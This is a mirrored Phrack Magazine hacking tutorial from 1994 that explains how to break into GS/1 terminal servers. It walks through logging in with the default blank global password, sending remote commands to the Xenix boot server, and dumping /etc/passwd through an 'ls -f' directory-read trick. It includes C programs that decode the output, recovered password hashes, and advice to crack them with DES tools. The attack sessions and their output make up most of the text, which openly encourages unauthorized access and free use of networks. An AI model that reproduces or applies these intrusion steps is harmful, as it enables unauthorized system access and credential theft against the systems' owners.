mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
604 lines
24 KiB
Text
604 lines
24 KiB
Text
![]() |
==Phrack Magazine==
|
||
|
|
||
|
Volume Five, Issue Forty-Six, File 17 of 28
|
||
|
|
||
|
****************************************************************************
|
||
|
|
||
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
||
|
[<> <>]
|
||
|
[<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>]
|
||
|
[<> <>]
|
||
|
[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
|
||
|
[<> <>]
|
||
|
[<> Brought to you by: <>]
|
||
|
[<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>]
|
||
|
[<> <>]
|
||
|
[<> Story line: Maldoror -n- [)r. [)elam <>]
|
||
|
[<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>]
|
||
|
[<> Unix Technical Expertise: Wunder-Boy [)elam <>]
|
||
|
[<> Sysco Technishun: Marvelous Maldoror <>]
|
||
|
[<> <>]
|
||
|
[<> Look for other fine [)elamo Labz and ChURcH oF ThE <>]
|
||
|
[<> Non-CoNForMisT products already on the market such as <>]
|
||
|
[<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>]
|
||
|
[<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>]
|
||
|
[<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>]
|
||
|
[<> identification program), and various other programs and <>]
|
||
|
[<> philez written by Dr. Delam, Maldoror, Green Paradox, <>]
|
||
|
[<> El Penga, Hellpop, and other certified DLI and CNC members. <>]
|
||
|
[<> <>]
|
||
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
||
|
|
||
|
Index
|
||
|
========================================
|
||
|
|
||
|
1. Finding and identifying a GS/1
|
||
|
2. Getting help
|
||
|
3. Gaining top privilege access
|
||
|
4. Finding the boot server
|
||
|
5. Connecting to the boot server
|
||
|
6. Getting the boot server password file
|
||
|
7. Other avenues
|
||
|
|
||
|
|
||
|
----------------------------------------------------------------------------
|
||
|
|
||
|
|
||
|
Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is
|
||
|
advisable to fill your stein with Sysco and pay close attention... if
|
||
|
Sysco is not available in your area, Hacker Pschorr beer will work
|
||
|
almost as good... (especially Oktoberfest variety)
|
||
|
|
||
|
|
||
|
What is a GS/1?
|
||
|
---------------
|
||
|
A GS/1 allows a user to connect to various other computers... in other
|
||
|
words, it's a server, like a DEC or Xyplex.
|
||
|
|
||
|
|
||
|
So why hack it?
|
||
|
---------------
|
||
|
Cuz itz there... and plus you kan access all sortz of net stuph fer
|
||
|
phree. (QSD @ 208057040540 is lame and if you connect to it, you're
|
||
|
wasting the GS/1.. the French fone police will fly over to your country
|
||
|
and hunt you down like a wild pack of dogs, then hang you by your own
|
||
|
twisted pair.)
|
||
|
|
||
|
|
||
|
What to do:
|
||
|
-----------
|
||
|
|
||
|
|
||
|
|
||
|
+--------------------------------------+
|
||
|
+ #1. Finding and identifying a GS/1 +
|
||
|
+--------------------------------------+
|
||
|
|
||
|
Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
|
||
|
GS/1, though the prompt can be set to whatever you want it to be. A
|
||
|
few years ago there were quite a number of GS/1's laying around on
|
||
|
Tymnet and Telenet... you can still find a few if you scan the right
|
||
|
DNIC's. (If you don't know what the hell I'm talking about, look at
|
||
|
some old Phracks and LOD tech. journals.)
|
||
|
|
||
|
The prompt will look similar to this:
|
||
|
|
||
|
(!2) GS/1>
|
||
|
|
||
|
(The (!2) refers to the port you are on)
|
||
|
|
||
|
|
||
|
|
||
|
+--------------------+
|
||
|
+ #2. Getting help +
|
||
|
+--------------------+
|
||
|
|
||
|
First try typing a '?' to display help items.
|
||
|
|
||
|
A help listing looks like this:
|
||
|
|
||
|
> (!2) GS/1>?
|
||
|
> Connect <address>[,<address>] [ ECM ] [ Q ]
|
||
|
> DO <macro-name>
|
||
|
> Echo <string>
|
||
|
> Listen
|
||
|
> Pause [<seconds>]
|
||
|
> PIng <address> [ timeout ]
|
||
|
> SET <param-name> = <value> ...
|
||
|
> SHow <argument> ...
|
||
|
|
||
|
At higher privileges such as global (mentioned next) the help will
|
||
|
look like this (note the difference in the GS/1 prompt with a # sign):
|
||
|
|
||
|
> (!2) GS/1# ?
|
||
|
> BRoadcast ( <address> ) <string>
|
||
|
> Connect ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
|
||
|
> DEFine <macro-name> = ( <text> )
|
||
|
> DisConnect ( <address> ) [<session number>]
|
||
|
> DO ( <address> ) <macro-name>
|
||
|
> Echo <string>
|
||
|
> Listen ( <address> )
|
||
|
> Pause [<seconds>]
|
||
|
> PIng <address> [ timeout ]
|
||
|
> ReaD ( <address> ) <option> <parameter>
|
||
|
> REMOTE <address>
|
||
|
> ROtary ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ...
|
||
|
> SAve ( <address> ) <option> <filename>
|
||
|
> SET ( <address> ) <param-name> = <value> ...
|
||
|
> SETDefault ( <address> ) [<param-name> = <value>] ...
|
||
|
> SHow ( <address> ) <argument> ...
|
||
|
> UNDefine ( <address> ) <macro-name>
|
||
|
> UNSave ( <address> ) <filename>
|
||
|
> ZeroMacros ( <address> )
|
||
|
> ZeroStats ( <address> )
|
||
|
|
||
|
Additional commands under global privilege are: BRoadcast, DEFine,
|
||
|
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
|
||
|
ZeroStats, and a few extra options under the normal user commands.
|
||
|
|
||
|
If you need in-depth help for any of the commands, you can again use the
|
||
|
'?' in the following fashion:
|
||
|
|
||
|
> (!2) GS/1>sho ?
|
||
|
> SHow ADDRess
|
||
|
> SHow ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
|
||
|
> SHow DefaultParameters [<param-name> ...]
|
||
|
> SHow GLobalPARameters
|
||
|
> SHow NetMAP [ Short | Long ]
|
||
|
> SHow PARAmeterS [<param-name> ...]
|
||
|
> SHow <param-name> ...
|
||
|
> SHow SESsions [ P ]
|
||
|
> SHow VERSion
|
||
|
|
||
|
> (!2) GS/1>sh add?
|
||
|
> SHow ADDRess
|
||
|
|
||
|
> (!2) GS/1>sh add
|
||
|
> ADDRess = &000023B5%07000201E1D7!2
|
||
|
|
||
|
"sh add" displays your own network, address and port number.
|
||
|
|
||
|
The network is 000023B5
|
||
|
The address is 07000201E1D7
|
||
|
The port number is 2
|
||
|
|
||
|
|
||
|
|
||
|
+------------------------------------+
|
||
|
+ #3. Gaining top privilege access +
|
||
|
+------------------------------------+
|
||
|
|
||
|
Figure out the global password.
|
||
|
|
||
|
Do a "set priv=global" command.
|
||
|
|
||
|
Note:
|
||
|
----
|
||
|
There are 3 states to set priv to: user, local, and global. Global is
|
||
|
the state with the most privilege. When you attain global privilege,
|
||
|
your prompt will change to have a '#' sign at the end of it.. this means
|
||
|
you have top priceless (similar to *nix's super user prompt).
|
||
|
|
||
|
The GS/1 will prompt you for a password. The default password on GS/1's
|
||
|
is to have no password at all... The GS/1 will still prompt you for a
|
||
|
password, but you can enter anything at this point if the password was
|
||
|
never set.
|
||
|
|
||
|
|
||
|
|
||
|
+-------------------------------+
|
||
|
+ #4. Finding the boot server +
|
||
|
+-------------------------------+
|
||
|
|
||
|
Figure out the boot server address available from this GS/1 ..
|
||
|
|
||
|
The boot server is what lies under the GS/1. We've found that GS/1's are
|
||
|
actually run on a Xenix operating system.. (which is of course a nice
|
||
|
phamiliar territory) It's debatable whether all GS/1's are run on Xenix or
|
||
|
not as we have yet to contact the company. (We may put out a 2nd file going
|
||
|
into more detail.)
|
||
|
|
||
|
Do a "sh b" or "sh global" as shown in the following examples:
|
||
|
|
||
|
> (!2) GS/1# sh b
|
||
|
> BAud = 9600 BootServerAddress = &00000000%070002017781
|
||
|
> BReakAction = ( FlushVC, InBand ) BReakChar = Disabled
|
||
|
> BSDelay = None BUffersize = 82
|
||
|
|
||
|
> (!2) GS/1# sh global
|
||
|
> ...............................Global Parameters............................
|
||
|
> DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes
|
||
|
> DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r"
|
||
|
> WelcomeString = "Welcome to your haqued server (!2), Connected to "
|
||
|
> DOmain = "thelabz" Organization = "delam0"
|
||
|
> PROmpt = "GS/1>" NMPrompt = "GS/1# "
|
||
|
> LocalPassWord = "" GlobalPassWord = "haque-me"
|
||
|
> NetMapBroadcast = ON MacType = EtherNET
|
||
|
> CONNectAudit = ON ERRorAudit = ON
|
||
|
> AUditServerAddress = &000031A4%07000200A3D4
|
||
|
> AUditTrailType = Local
|
||
|
> BootServerAddress = &00000000%070002017781
|
||
|
|
||
|
Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
|
||
|
... these are the actual passwords that need to be entered (or in the case
|
||
|
of the LocalPassWord, "" matches any string). You'll only be able to
|
||
|
"sh global" after a successful "set priv=global".
|
||
|
|
||
|
Now that you have the boot server address, the next step is enabling
|
||
|
communication to the boot server.
|
||
|
|
||
|
|
||
|
|
||
|
+-------------------------------------+
|
||
|
+ #5. Connecting to the boot server +
|
||
|
+-------------------------------------+
|
||
|
|
||
|
Do a REMOTE <address> where address is the address of the machine you
|
||
|
want to issue remote commands to.
|
||
|
|
||
|
> (!2) GS/1# REMOTE %070002017781
|
||
|
> (!2) Remote: ?
|
||
|
> BInd <address> [-f <bootfile>] [-l <loader>] [<nports>]
|
||
|
> BRoadcast ( <address> ) "<string>"
|
||
|
> CoPyfile [<address>:]<pathname> [<address>:][<pathname>]
|
||
|
> LiSt [ -ls1CR ] [<pathname> ...]
|
||
|
> MoVe <pathname> <pathname>
|
||
|
> NAme <clearinghouse name> = <address>[,<address>]...
|
||
|
> Ping <address> [timeout]
|
||
|
> ReMove <pathname> ...
|
||
|
> SET [( <address> )] <param-name> = <value> ...
|
||
|
> SETDefault <param-name> = <value> ...
|
||
|
> SHow <argument>
|
||
|
> UNBind <address>
|
||
|
> UNDefine <macro name>
|
||
|
> UNName <name>
|
||
|
> ZeroStats
|
||
|
> <BREAK> (to leave remote mode)
|
||
|
|
||
|
Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
|
||
|
you will be issuing commands to whatever remote machine you specified
|
||
|
by the REMOTE <address> command.
|
||
|
|
||
|
Notice for this case, the boot server's address was used.
|
||
|
|
||
|
When you get the REMOTE: prompt, you can issue commands that will be
|
||
|
executed on the remote machine. Try doing a '?' to see if it's another
|
||
|
GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.
|
||
|
|
||
|
Also notice that the help commands on the remote are not the same as
|
||
|
those for the GS/1 (though, if you establish a remote link with another
|
||
|
GS/1 they will be the same).
|
||
|
|
||
|
> (!2) Remote: ls -l
|
||
|
> total 1174
|
||
|
> drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC
|
||
|
> drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL
|
||
|
> drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP
|
||
|
> drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN
|
||
|
> drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS
|
||
|
> drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP
|
||
|
> drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC
|
||
|
> drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS
|
||
|
> -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata
|
||
|
> -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir
|
||
|
> -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag
|
||
|
> drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev
|
||
|
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
|
||
|
> -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros
|
||
|
> -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd
|
||
|
|
||
|
Look familiar?? If not, go to the nearest convenient store and buy the
|
||
|
a 12 pack of the cheapest beer you can find.. leave your computer
|
||
|
connected so you hurry back, and slam eight or nine cold onez... then
|
||
|
look at the screen again.
|
||
|
|
||
|
You're basically doing a Remote Procedure Call for ls to your Xenix boot
|
||
|
server.
|
||
|
|
||
|
Notice at this point that the "passwd" is not owned by root. This is
|
||
|
because this is not the system password file, and you are not in the
|
||
|
"/etc" directory... (yet)
|
||
|
|
||
|
There are a couple of problems:
|
||
|
|
||
|
> (!2) Remote: cat
|
||
|
> Invalid REMOTE command
|
||
|
>
|
||
|
> (!2) Remote: cd /etc
|
||
|
> Invalid REMOTE command
|
||
|
|
||
|
You cannot view files and you cannot change directories.
|
||
|
|
||
|
To solve the "cd" problem do the following:
|
||
|
|
||
|
> (!2) Remote: ls -l ..
|
||
|
> total 26
|
||
|
> drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS
|
||
|
> drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm
|
||
|
> drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup
|
||
|
> drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin
|
||
|
> drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib
|
||
|
> drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs
|
||
|
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve
|
||
|
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub
|
||
|
> drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool
|
||
|
> drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys
|
||
|
> drwxr-x--- 2 root root 48 Aug 17 1989 sysadm
|
||
|
> drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp
|
||
|
>
|
||
|
> (!2) Remote: ls -l ../..
|
||
|
> total 1402
|
||
|
> -rw-r--r-- 1 root root 1605 Aug 17 1989 .login
|
||
|
> -r--r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs
|
||
|
> -rw-r--r-- 1 root root 653 Aug 17 1989 .logout
|
||
|
> -r--r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs
|
||
|
> -rw------- 1 root root 427 Aug 17 1989 .profile
|
||
|
> drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin
|
||
|
> -r-------- 1 bin bin 25526 May 4 1989 boot
|
||
|
> drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev
|
||
|
> -r-------- 1 bin bin 577 Nov 3 1987 dos
|
||
|
> drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc
|
||
|
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 lib
|
||
|
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
|
||
|
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 mnt
|
||
|
> drwxrwxrwx 2 bin bin 512 Jun 5 01:20 tmp
|
||
|
> drwxr-xr-x 14 bin bin 224 Aug 17 1989 usr
|
||
|
> -rw-r--r-- 1 bin bin 373107 Aug 17 1989 xenix
|
||
|
> -rw-r--r-- 1 root root 287702 Aug 17 1989 xenix.old
|
||
|
|
||
|
Your brain should now experience deja vous.. you just found the
|
||
|
root directory. (for the non-*nix, lam0-hacker, the root directory
|
||
|
has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)
|
||
|
|
||
|
Now you can get to /etc/passwd as follows:
|
||
|
|
||
|
> (!2) Remote: ls -l ../../etc
|
||
|
> total 1954
|
||
|
> -rwx--x--x 1 bin bin 7110 May 8 1989 accton
|
||
|
> -rwx------ 1 bin bin 1943 May 8 1989 asktime
|
||
|
> -rwx------ 1 bin bin 31756 May 8 1989 badtrk
|
||
|
> -rw-rw-rw- 1 root root 1200 Apr 24 12:40 bootlog
|
||
|
> -rwx--x--x 1 bin bin 24726 May 8 1989 brand
|
||
|
> -rw-r--r-- 1 bin bin 17 Aug 17 1989 checklist
|
||
|
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.last
|
||
|
> -rw-r--r-- 1 ncs ncs 17 Aug 28 1990 checklist.ncs
|
||
|
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.orig
|
||
|
> -rwx------ 1 bin bin 2857 May 8 1989 chsh
|
||
|
> -rwx------ 1 bin bin 7550 May 8 1989 clri
|
||
|
> -rwx------ 1 bin bin 8034 May 8 1989 cmos
|
||
|
> -rwxr-xr-x 1 root bin 31090 Aug 28 1990 cron
|
||
|
> -rw-r--r-- 1 bin bin 369 May 8 1989 cshrc
|
||
|
> ...... etc.
|
||
|
> -rw-r--r-- 1 root root 465 Mar 5 1991 passwd
|
||
|
|
||
|
Yeah, now what?!
|
||
|
|
||
|
You've found the /etc/passwd file, but you don't have "cat" to type the
|
||
|
file out. Now you're stuck... so drink a half a bottle of Sysco per
|
||
|
person. (We did... and as you'll see, Sysco is the drink of a manly hackers
|
||
|
like us... make sure it's the big bottle kind not those girly small
|
||
|
onez.)
|
||
|
|
||
|
|
||
|
|
||
|
+---------------------------------------------+
|
||
|
+ #6. Getting the boot server password file +
|
||
|
+---------------------------------------------+
|
||
|
|
||
|
There is one way to get around the cat problem (no itz n0t puttin
|
||
|
catnip laced with somethin U made frum a phile on yer doorstep)
|
||
|
It's done using ls. On this Xenix system, the directory structure is
|
||
|
the old Unix format: A 16 byte record comprised of a 2 byte I-number
|
||
|
and a 14 byte character field.
|
||
|
|
||
|
Note about directory structure for the inquisitive hacker:
|
||
|
In a directory record there is a 14 byte string containing the file
|
||
|
name, and the 2 byte I-number (2 bytes = an integer in this case)
|
||
|
which is a number that is an (I)ndex pointer to the I-node. The
|
||
|
I-node then contains the information about where the file's data is
|
||
|
actually kept (similar to how a FAT table works on an IBM PC yet a
|
||
|
different concept as it has indirect index blocks etc. I won't get
|
||
|
into) and what permissions are set for the file. Be warned that in
|
||
|
newer *nix implementations, file names can be more than 14 characters
|
||
|
and the directory structure will be a bit different than discussed.
|
||
|
|
||
|
The "ls" command has an option that allows you to tell it "this *file* is
|
||
|
a *directory*.. so show me what's in the directory"... newer *nix
|
||
|
systems won't like this (the -f option) because of the new directory
|
||
|
structure.
|
||
|
|
||
|
> (!2) Remote: ls -?
|
||
|
> ls: illegal option --?
|
||
|
> usage: -1ACFRabcdfgilmnopqrstux [files]
|
||
|
>
|
||
|
> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
|
||
|
> 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
|
||
|
> 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
|
||
|
> 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
|
||
|
> 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
|
||
|
> 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
|
||
|
> 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
|
||
|
> 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
|
||
|
> 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
|
||
|
> 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
|
||
|
> 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
|
||
|
> 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
|
||
|
> 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL
|
||
|
> 22327 xcU:100:100:NC 8275 operator:/usr/
|
||
|
>
|
||
|
> (!2) Remote: <BRK>
|
||
|
> (!2) GS/1#
|
||
|
|
||
|
Wow, kewl. Now that you have a bunch-o-shit on your screen, you have
|
||
|
to make some sense out of it.
|
||
|
|
||
|
The password file is almost legible, but the I-numbers still need to be
|
||
|
converted to ASCII characters. This can be accomplished in a variety of
|
||
|
ways... the easiest is to write a program like the following in C:
|
||
|
|
||
|
On a PC the following code should work:
|
||
|
|
||
|
#include <stdio.h>
|
||
|
main()
|
||
|
{
|
||
|
union {
|
||
|
int i;
|
||
|
char c[2];
|
||
|
} x;
|
||
|
while (1) {
|
||
|
printf("Enter I-Number: ");
|
||
|
scanf("%d", &x.i);
|
||
|
printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
On a *nix based system the following code will work (depending on
|
||
|
word size and byte arrangement):
|
||
|
|
||
|
#include <stdio.h>
|
||
|
main()
|
||
|
{
|
||
|
union {
|
||
|
short int i;
|
||
|
char c[2];
|
||
|
} x;
|
||
|
while (1) {
|
||
|
printf("Enter I-Number: ");
|
||
|
scanf("%hd", &x.i);
|
||
|
printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
|
||
|
When you have translated the I-numbers you can substitute the ASCII
|
||
|
values by hand (or write a d0p3 program to do it for you):
|
||
|
|
||
|
28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
|
||
|
28530 = [r][o] 30580 = [t][w] 14962 = [r][:]
|
||
|
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
|
||
|
|
||
|
25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
|
||
|
25697 = [a][d] 14929 = [Q][:] 28265 = [i][n]
|
||
|
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
|
||
|
|
||
|
29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
|
||
|
29487 = [/][s] 29283 = [c][r] 17210 = [:][C]
|
||
|
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
|
||
|
|
||
|
28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
|
||
|
28704 = [ ][p] 14895 = [/][:] 13114 = [:][3]
|
||
|
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
|
||
|
|
||
|
28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
|
||
|
28004 = [d][m] 29962 = [^M][u] 25697 = [a][d]
|
||
|
dministration:/:
|
||
|
uucp::4:4:Uucp administration:/
|
||
|
|
||
|
29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
|
||
|
29557 = [u][s] 27746 = [b][l] 28771 = [c][p]
|
||
|
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
|
||
|
|
||
|
20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
|
||
|
20300 = [L][O] 25185 = [a][b] 26990 = [n][i]
|
||
|
LOGIN:6:6:Assignable device administration:/:?sy
|
||
|
|
||
|
26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
|
||
|
26995 = [s][i] 12602 = [:][1] 29811 = [s][t]
|
||
|
sinfo:NOLOGIN:10:10:Access to system information
|
||
|
|
||
|
12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
|
||
|
12090 = [:][/] 18759 = [G][I] 25710 = [n][d]
|
||
|
:/:?network:NOLOGIN:12:12:Mail and Network admin
|
||
|
|
||
|
29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
|
||
|
29545 = [i][s] 28528 = [p][o] 20302 = [N][O]
|
||
|
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
|
||
|
|
||
|
29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
|
||
|
29806 = [n][t] 29545 = [i][s] 28528 = [p][o]
|
||
|
nt spooler administration:/usr/spool/lp:?dos:NOL
|
||
|
|
||
|
18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL
|
||
|
18255 = [O][G] 8307 = [s][ ] 12090 = [:][/]
|
||
|
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
|
||
|
|
||
|
22327 xcU:100:100:NC 8275 operator:/usr/
|
||
|
22327 = [7][W] 8275 = [S][ ]
|
||
|
7WxcU:100:100:NCS operator:/usr
|
||
|
|
||
|
|
||
|
The resulting file will look like the following:
|
||
|
|
||
|
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
|
||
|
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
|
||
|
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
|
||
|
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
|
||
|
dministration:/:
|
||
|
uucp::4:4:Uucp administration:/
|
||
|
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
|
||
|
LOGIN:6:6:Assignable device administration:/:?sy
|
||
|
sinfo:NOLOGIN:10:10:Access to system information
|
||
|
:/:?network:NOLOGIN:12:12:Mail and Network admin
|
||
|
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
|
||
|
nt spooler administration:/usr/spool/lp:?dos:NOL
|
||
|
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
|
||
|
7WxcU:100:100:NCS operator:/usr
|
||
|
|
||
|
Because the ls command cannot display "non-printable" characters such
|
||
|
as the carriage return, it will replace them with a '?' character...
|
||
|
delete the '?' characters and divide by line at these locations. When
|
||
|
you finish doing that, you'll have a standard /etc/passwd file:
|
||
|
|
||
|
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
|
||
|
sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
|
||
|
cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
|
||
|
bin:NOLOGIN:3:3:System file administration:/:
|
||
|
uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
|
||
|
asg:NOLOGIN:6:6:Assignable device administration:/:
|
||
|
sysinfo:NOLOGIN:10:10:Access to system information:/:
|
||
|
network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
|
||
|
lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
|
||
|
dos:NOLOGIN:16:10:Access to Dos devices:/:
|
||
|
ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr
|
||
|
|
||
|
Once you've assembled your password file in a standard ASCII form,
|
||
|
you'll of course want to crack it with one of the many available DES
|
||
|
cracking programs.
|
||
|
|
||
|
+---------------------+
|
||
|
+ #7: Other Avenues +
|
||
|
+---------------------+
|
||
|
|
||
|
Find out what else you can play with by first finding what networks are
|
||
|
available other than your own, and second, find out what machines are on
|
||
|
your network:
|
||
|
|
||
|
>(!2) GS/1# sh att
|
||
|
> Attached Networks
|
||
|
>&000023B5
|
||
|
>(!2) GS/1# sh nmap l
|
||
|
> NETWORK &000023B5 MAP
|
||
|
>
|
||
|
> 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1
|
||
|
> 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020
|
||
|
> 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS 2.1.1
|
||
|
> 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2
|
||
|
> .... etc.
|
||
|
|
||
|
The boot server address, from previous examples, is number 1
|
||
|
which contains a description "SW/AT-NCS". Examining the rest of the
|
||
|
list, number 6 has the same description. System 12 may be just another
|
||
|
address for the boot server or it may be a different Xenix... but it should
|
||
|
be Xenix whatever it is.
|
||
|
|
||
|
We have refrained from covering the typical GS/1 information that has been
|
||
|
published by others; and instead, covered newer concepts in GS/1 hacking.
|
||
|
This phile is not a complete guide to GS/1 hacking; but expect successive
|
||
|
publications on the topic.
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|